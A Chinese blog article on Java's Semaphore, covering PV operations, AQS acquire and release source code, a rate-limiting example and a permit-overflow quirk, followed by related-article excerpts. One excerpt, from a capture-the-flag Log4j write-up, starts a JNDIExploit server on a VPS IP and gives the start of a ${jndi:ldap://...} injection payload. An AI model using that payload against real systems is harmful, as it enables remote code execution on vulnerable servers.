深入理解Semaphore

Semaphore(信号量)是操作系统中PV操作的原语在java中的实现,它也是基于AQS实现的。其中PV操作是操作系统中一种实现进程互斥与同步的有效方法。PV操作与信号量(S)的处理有关,P表示通过,V表示释放。用PV操作来管理共享资源时,首先要确保PV操作自身执行的正确性。

P操作的主要动作如下:

  1. S减1;
  2. 若S减1后仍大于等于0,则进程继续执行;
  3. 若S减1后小于0,则该进程被阻塞后放入等待该信号量的等待队列中,转进程调度。

V操作的主要动作如下:

  1. S加1;
  2. 若相加后结果大于0,则进程继续执行;
  3. 若相加后结果小于等于0,则从该信号的等待队列中释放一个等待进程,再返回原进程继续执行或转进程调度。

ReentrantLock是AQS的独占锁实现,Semaphore是AQS的共享锁实现。Semaphore通过设置资源数量可以实现限流的功能,即控制同时只能有n个线程获取信号量。AQS的state对Semaphore来说可以是共享资源的数量,也可以是许可证的数量。当state>0时线程可以获得许可证继续执行,state-1;当state=0时线程不能获得许可证进入同步等待队列,阻塞直到被唤醒。

Semaphore有两个构造函数,如下:

//传入许可证数量
public Semaphore(int permits) {
    sync = new NonfairSync(permits);
}
//传入共享资源数量和是否公平锁,默认是非公平锁
public Semaphore(int permits, boolean fair) {
    sync = fair ? new FairSync(permits) : new NonfairSync(permits);
}

其常用方法和方法作用如下:

  • public void acquire() throws InterruptedException:尝试获取锁,如果获取失败则阻塞;
  • public boolean tryAcquire():尝试获取锁,如果获取失败则直接返回false,不会阻塞;
  • public void release():释放许可;
  • public int availablePermits():获取可用的许可证数;
  • public final int getQueueLength():返回正在等待获取许可证的线程数;
  • public final boolean hasQueuedThreads():是否有线程正在等待许可证;
  • protected void reducePermits(int reduction):减少reduction个许可证;
  • public final Collection<Thread> getQueuedThreads():获取等待许可证的线程集合。

Semaphore使用示例如下,初始化一个许可证数量为3的信号量,doSomething()方法每次都需要获取一个信号量才能执行,执行时间为2S,因此即便是main方法中的线程池每秒执行5次doSomething()方法,最终的效果仍然是每两秒执行三次doSomething()方法,这就达到了限流的目的。

@Slf4j
public class SemaphoreExample {

    //定义一个许可证数量为3的信号量
    private static Semaphore semaphore = new Semaphore(3);

    //线程池
    private static ThreadPoolExecutor executor = new ThreadPoolExecutor(5,10,30, TimeUnit.SECONDS,new ArrayBlockingQueue<>(50));

    public static void main(String[] args) throws InterruptedException {
        while (true) {
            executor.execute(() -> doSomething());

            //每秒执行5次
            Thread.sleep(200);
        }
    }

    private static void doSomething() {
        try {
            //尝试获取一个许可证
            semaphore.acquire(1);
            log.info("正在执行...");
            Thread.sleep(2000);
        } catch (InterruptedException e) {
            log.error("操作失败",e);
        } finally {
            //释放许可
            semaphore.release();
        }
    }
}

控制台打印如下,可以看到大概每两秒才会执行三次doSomething()方法,这就是由信号量Semaphore来控制的。

17:42:54.199 [pool-1-thread-1] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:42:54.409 [pool-1-thread-2] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:42:54.609 [pool-1-thread-3] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:42:56.203 [pool-1-thread-4] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:42:56.421 [pool-1-thread-2] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:42:56.622 [pool-1-thread-5] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:42:58.204 [pool-1-thread-1] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:42:58.421 [pool-1-thread-3] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:42:58.623 [pool-1-thread-5] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:43:00.214 [pool-1-thread-1] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:43:00.427 [pool-1-thread-4] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...
17:43:00.626 [pool-1-thread-5] INFO com.company.charles.multithreading.SemaphoreExample - 正在执行...

源码解析

Semaphore的AQS实现也区分公平和非公平,由于这两种锁的区别很小,此处只介绍较常用的也是默认的非公平锁的实现。

acquire(permits)获取许可证

  1. Semaphore获取许可证的方法是acquire(permits),实现如下:
public void acquire(int permits) throws InterruptedException {
    if (permits < 0) throw new IllegalArgumentException();
    sync.acquireSharedInterruptibly(permits);
}
  1. acquireSharedInterruptibly(permits)方法是AQS中定义的共享锁获取锁的通用方法,实现如下:
public final void acquireSharedInterruptibly(int arg) throws InterruptedException {
	if (Thread.interrupted())
        throw new InterruptedException();
    if (tryAcquireShared(arg) < 0)
        doAcquireSharedInterruptibly(arg);
}
  1. tryAcquireShared(arg)是提供给子类实现的模版方法,该方法在Semaphore中的实现如下:
protected int tryAcquireShared(int acquires) {
    return nonfairTryAcquireShared(acquires);
}

final int nonfairTryAcquireShared(int acquires) {
    for (;;) {
        //获取state许可证数量
        int available = getState();
        int remaining = available - acquires;
        //remaining小于0,表示获取许可证失败,返回一个负值
        //remaining大于等于0,表示剩余许可证是足够的,使用CAS尝试修改state许可证数量,如果获取失败则重复获取直到获取成功,返回一个大于等于0的值
        if (remaining < 0 ||
            compareAndSetState(available, remaining))
            return remaining;
    }
}
  1. 在第2步中,如果tryAcquireShared(arg)方法返回值不小于0,则表示当前线程使用CAS获取许可证成功,否则获取失败调用doAcquireSharedInterruptibly(arg)方法进入同步等待队列阻塞,doAcquireSharedInterruptibly(arg)方法实现如下:
private void doAcquireSharedInterruptibly(int arg)
    throws InterruptedException {
    //将当前线程封装成一个Node对象
    final Node node = addWaiter(Node.SHARED);
    boolean failed = true;
    try {
        for (;;) {
            final Node p = node.predecessor();
            //如果当前节点的的前一个节点是head,则尝试获取许可证
            if (p == head) {
                int r = tryAcquireShared(arg);
                if (r >= 0) {
                    //获取许可证成功则设置当前节点为head节点
                    setHeadAndPropagate(node, r);
                    p.next = null; // help GC
                    failed = false;
                    return;
                }
            }
            //如果当前节点不是head的下一个节点,则直接阻塞
            if (shouldParkAfterFailedAcquire(p, node) &&
                 parkAndCheckInterrupt())
                throw new InterruptedException();
        }
    } finally {
        if (failed)
             cancelAcquire(node);
    }
}

acquire(permits)获取许可证方法的流程总结如下:

  1. 调用Semaphore实现的tryAcquireShared(arg)方法尝试获取许可证;
  2. 如果当前许可证数量足够(即state-要获取的许可证数量>=0),则循环调用CAS尝试修改state获取许可证,直到获取成功直接返回或者许可证被其他线程获取导致数量不够;
  3. 如果当前许可证数量不够(即state-要获取的许可证数量<0),则将当前线程封装到Node对象并添加到同步队列中;
  4. 判断当前节点是否是head节点的下一个节点,如果是则尝试获取许可证、出队head节点、设置当前Node为head节点并返回;如果不是,则调用LockSupport.park()方法阻塞当前线程。

release(permits)释放许可证

  1. release(permits)方法的实现如下:
public void release(int permits) {
    if (permits < 0) throw new IllegalArgumentException();
    sync.releaseShared(permits);
}
  1. releaseShared(permits)是AQS中实现的共享锁释放锁的通用方法,实现如下:
public final boolean releaseShared(int arg) {
    if (tryReleaseShared(arg)) {
        doReleaseShared();
        return true;
    }
    return false;
}
  1. tryReleaseShared(arg)是AQS定义的给子类实现的模版方法,该方法在Semaphore的实现如下:
protected final boolean tryReleaseShared(int releases) {
    for (;;) {
        //获取许可证数量
        int current = getState();
        int next = current + releases;
        //next < current表示要释放的许可证releases<0,抛出异常
        if (next < current) // overflow
            throw new Error("Maximum permit count exceeded");
        //使用CAS修改许可证数量,如果失败则重复调用,直到修改成功返回true
        if (compareAndSetState(current, next))
            return true;
    }
}
  1. tryReleaseShared(arg)返回true后,调用doReleaseShared()方法,该方法在AQS中实现,具体实现如下:
private void doReleaseShared() {
    //遍历唤醒同步等待队列节点,释放许可证
    for (;;) {
        Node h = head;
        if (h != null && h != tail) {
            int ws = h.waitStatus;
            if (ws == Node.SIGNAL) {
                if (!compareAndSetWaitStatus(h, Node.SIGNAL, 0))
                    continue;            // loop to recheck cases
                unparkSuccessor(h);
        	}
            else if (ws == 0 && !compareAndSetWaitStatus(h, 0, Node.PROPAGATE))
                continue;                // loop on failed CAS
        }
        //前面如果没有节点被唤醒,则h仍然指向head,表示许可证已经释放完成或者许可证数量已经不够了,直接返回
        if (h == head)                   // loop if head changed
            break;
    }
}

private void unparkSuccessor(Node node) {
    int ws = node.waitStatus;
    if (ws < 0)
        compareAndSetWaitStatus(node, ws, 0);
    Node s = node.next;
    if (s == null || s.waitStatus > 0) {
        s = null;
        for (Node t = tail; t != null && t != node; t = t.prev)
            if (t.waitStatus <= 0)
                s = t;
    }
    if (s != null)
        LockSupport.unpark(s.thread);
}

release(permits)方法释放许可证的流程总结如下:

  1. 调用tryReleaseShared(arg)方法尝试释放许可证,如果释放失败则一直调用CAS修改state许可证数量,直到成功返回true;
  2. 释放成功后,唤醒同步等待队列中的head的下一个节点;
  3. head的下一个节点被唤醒后,会继续执行doAcquireSharedInterruptibly()方法中的循环语句尝试获取许可证;
  4. 另外,此处会一直唤醒同步等待队列中的节点,直到同步等待队列节点为空或者许可证数量不够。

需要注意的是,tryReleaseShared(arg)方法释放许可证方法并没有判断许可证上限,例如定义了信号量的许可证数量为1,直接调用release()方法,在tryReleaseShared()方法中调用CAS是可以修改成功的,这里直接修改的是AQS中的state,因此先调用release()方法会影响限流效果。

例如下面初始化Semaphore的许可证数量为1,调用10次release()方法后,许可证数量变成了11。

public static void main(String[] args) throws InterruptedException {
    Semaphore semaphore = new Semaphore(1);
    for (int i=0;i<10;i++) {
        semaphore.release(1);
    }
    System.out.println(semaphore.availablePermits());
}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/83982.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

SpringCloud Gateway服务网关的介绍与使用

目录 1、网关介绍2、SpringCloudGateway工作原理3、三大组件3.1 、Route&#xff08;路由&#xff09;3.2、断言 Predicate3.3、过滤器 filter 4、Gateway整合nacos的使用4.1 、引入依赖4.2、 编写基础类和启动类4.3、 编写基础配置和路由规则4.4 、测试结果 1、网关介绍 客户…

面试之HTTP

1.HTTP与HTTPS的区别 HTTP运行在TCP之上&#xff1b;HTTPS是运行在SSL之上&#xff0c;SSL运行在TCP之上两者使用的端口不同&#xff1a;HTTP使用的是80端口&#xff0c;HTTPS使用的是443端口安全性不同&#xff1a;HTTP没有加密&#xff0c;安全性较差&#xff1b;HTTPS有加密…

为什么选择elasticsearch分布式搜索引擎

文章目录 &#x1f52d;什么是elasticsearch&#x1f320;ELK技术栈&#x1f320;elasticsearch和lucene&#x1f320;为什么不是其他搜索技术&#xff1f; &#x1f52d;总结 &#x1f52d;什么是elasticsearch elasticsearch是一款非常强大的开源搜索引擎&#xff0c;具备非常…

让智慧城市更进一步,无人机解决方案全面应用

在城市规划中&#xff0c;无人机正在颠覆传统的操作和思维方式。这种技术不仅改变了城市管理获取和分析信息的方式&#xff0c;还提供了前所未有的视角&#xff0c;使城市管理能够更加明智地制定策略。 1. 数据采集的新纪元&#xff1a; 城市规划的核心在于数据的收集和分析。…

Mysql5.7.36主从同步实操

主库创建同步账户 #创建备份的账户 CREATE USER backup192.168.32.1 IDENTIFIED BY backup123; #给账户授予备份的权限 GRANT REPLICATION SLAVE ON *.* TO backup192.168.32.1; #刷新权限 FLUSH PRIVILEGES;停止主库 配置主库需要的备份参数 打开my.ini文件&#xff0c;配置…

Hive(一)

一、DDL 1、数据库操作 1&#xff09;、创建数据库 语法&#xff1a; CREATE DATABASE [IF NOT EXISTS] database_name [COMMENT database_comment] [LOCATION hdfs_path] [WITH DBPROPERTIES (property_nameproperty_value, ...)]; 案例&#xff1a; &#xff08;1&…

卷积神经网络——下篇【深度学习】【PyTorch】

文章目录 5、卷积神经网络5.10、⭐批量归一化5.10.1、理论部分5.10.2、代码部分 5.11、⭐残差网络&#xff08;ResNet&#xff09;5.11.1、理论部分5.11.2、代码部分 话题闲谈 5、卷积神经网络 5.10、⭐批量归一化 5.10.1、理论部分 批量归一化可以解决深层网络中梯度消失和…

Anaconda, Python, Jupyter和PyCharm介绍

目录 1 Anaconda, Python, Jupyter和PyCharm介绍 2 macOS通过Anaconda安装Python, Jupyter和PyCharm 3 使用终端创建虚拟环境并安装PyTorch 4 安装PyCharm并导入Anaconda虚拟环境 5 Windows操作系统下Anaconda与PyCharm安装 6 通过 Anaconda Navigator 创建 TensorFlow 虚…

静态代码扫描持续构建(Jenkins)

前提条件 已正确安装、配置Jenkins环境&#xff0c;并装有 Gradle 插件、HTML 插件、SVN 插件等。如下图所示&#xff1a; 已正确安装、配置android sdk&#xff0c;在cmd窗口输入命令“android -h”,回车 配置步骤 打开Jenkins&#xff0c;新建一个job&#xff0c;输入项目…

ABAP 定义复杂的数据结构

最近有个需求是实现ABAP数据类型与JASON类型的转换。想要创建个ABAP的数据类型来接JASON类型是个挺麻烦的事。例如下面这个JASON数据&#xff0c;是个很简单的数据结构。但对ABAP来说有4层了&#xff0c;就有点复杂了。 不过ABAP的数据类型也是支持直接定义数据结构的嵌套的。如…

Nginx特性应用及载装

Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器。其特点是占有内存少&#xff0c;并发能力强&#xff0c;事实上nginx的并发能力在同类型的网页服务器中表现较好&#xff0c;中国大陆使用nginx的网站有&#xff1a;网易、腾讯、阿里等。 …

多维时序 | MATLAB实现WOA-CNN-GRU-Attention多变量时间序列预测

多维时序 | MATLAB实现WOA-CNN-GRU-Attention多变量时间序列预测 目录 多维时序 | MATLAB实现WOA-CNN-GRU-Attention多变量时间序列预测预测效果基本介绍模型描述程序设计参考资料 预测效果 基本介绍 MATLAB实现WOA-CNN-GRU-Attention多变量时间序列预测&#xff0c;WOA-CNN-GR…

【云原生】Docker Cgroups资源控制管理

目录 一、cgroups简介 cgroups有四大功能&#xff1a; 二、cpu时间片的概念 三、对CPU使用的限制 3.1 设置CPU使用率上限 &#xff08;1&#xff09;查看容器的默认CPU使用限制 &#xff08;2&#xff09;进行压力测试 &#xff08;3&#xff09;创建容器时设置CPU使用时…

安装Vue_dev_tools

Vue控制台出现Download the Vue Devtools extension for a better development experience: 下载Vue_dev_tools,这里给出网盘链接&#xff0c;有Vue2和Vue3的&#xff0c;dev_tools 以Google浏览器为例 点击设置&#xff08;就是那三个点&#xff09;->扩展程序->管理扩…

Matlab论文插图绘制模板第108期—特征渲染的标签散点图

在之前的文章中&#xff0c;分享了Matlab标签散点图的绘制模板&#xff1a; 进一步&#xff0c;再来分享一下特征渲染的标签散点图的绘制模板&#xff0c;以便再添加一个维度的信息。 先来看一下成品效果&#xff1a; 特别提示&#xff1a;本期内容『数据代码』已上传资源群中…

ctfshow-Log4j复现-log4j复现

1、买VPS&#xff0c;打开mobax进行ssh连接&#xff0c;开两个终端 一个终端开启监听 另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 116.62.152.84生成payload 构造payload ${jndi:ldap://…

Amelia预订插件:WordPress企业级预约系统

并非所有WordPress预订插件都像他们所设计的那样。其中一些缺乏运行高效预约操作所需的功能&#xff0c;而其他一些则看起来陈旧过时。您不需要其中任何一个&#xff0c;但Amelia预订插件似乎希望确保所有用户都对功能和风格感到满意。 在这篇Amelia企业级预约系统插件评测中&…

分类预测 | MATLAB实现1D-2D-CNN-GRU的多通道输入数据分类预测

分类预测 | MATLAB实现1D-2D-CNN-GRU的多通道输入数据分类预测 目录 分类预测 | MATLAB实现1D-2D-CNN-GRU的多通道输入数据分类预测分类效果基本介绍程序设计参考资料 分类效果 基本介绍 结合1D时序-2D图像多模态融合的CNN-GRU故障识别算法&#xff0c;基于一维时序信号和二维图…

<指针进阶>指针数组和数组指针傻傻分不清?

✨Blog&#xff1a;&#x1f970;不会敲代码的小张:)&#x1f970; &#x1f251;推荐专栏&#xff1a;C语言&#x1f92a;、Cpp&#x1f636;‍&#x1f32b;️、数据结构初阶&#x1f480; &#x1f4bd;座右铭&#xff1a;“記住&#xff0c;每一天都是一個新的開始&#x1…

编写Dockerfile制作Web应用系统nginx镜像,生成镜像nginx:v1.1,并推送其到私有仓库

Docker 镜像是一个特殊的文件系统&#xff0c;除了提供容器运行时所需的程序、库、资源、配置等文件外&#xff0c;还包含了一些为运行时准备的一些配置参数&#xff08;如匿名卷、环境变量、用户等&#xff09;。镜像不包含任何动态数据&#xff0c;其内容在构建之后也不会被改…